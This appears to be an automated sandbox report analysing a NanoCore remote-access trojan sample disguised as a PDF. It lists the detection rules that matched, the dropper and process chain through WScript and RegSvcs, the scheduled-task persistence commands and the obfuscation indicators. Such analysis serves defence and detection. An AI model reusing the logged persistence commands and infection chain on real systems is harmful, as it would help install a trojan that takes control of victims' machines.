      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00C0F122
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EF5F0 appears 31 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEC50 appears 56 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: String function: 003EEB78 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BC0DC0 appears 38 times
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: String function: 00BBFD60 appears 39 times
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_003D6FAA
      Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
      Source: 004349256789197.pdf.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@43/45@28/1
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Windows\win.iniJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D6C74 GetLastError,FormatMessageW,0_2_003D6C74
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_003EA6C2
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: 004349256789197.pdf.scr.exeReversingLabs: Detection: 44%
      Source: 004349256789197.pdf.scr.exeVirustotal: Detection: 39%
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile read: C:\Users\user\Desktop\004349256789197.pdf.scr.exeJump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbeJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exeJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder10_51Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,6_2_00C24089
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00C2AFDB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxname0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: sfxstime0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: STARTDLG0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCommand line argument: xzB0_2_003EDF1E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.iniJump to behavior
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: 004349256789197.pdf.scr.exeStatic file information: File size 1181640 > 1048576
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 004349256789197.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 004349256789197.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 004349256789197.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EF640 push ecx; ret 0_2_003EF653
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003EEB78 push eax; ret 0_2_003EEB96
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C362CC pushad ; ret 6_2_00C362D6
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BF0332 push edi; ret 6_2_00BF0333
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC0E06 push ecx; ret 6_2_00BC0E19
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BA5D78
      Source: 004349256789197.pdf.scr.exeStatic PE information: section name: .didat
      Source: ihgsvw.exe.0.drStatic PE information: real checksum: 0x15a0e8 should be: 0x1560ce
      Source: 004349256789197.pdf.scr.exeStatic PE information: real checksum: 0x0 should be: 0x12da1b
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750Jump to behavior
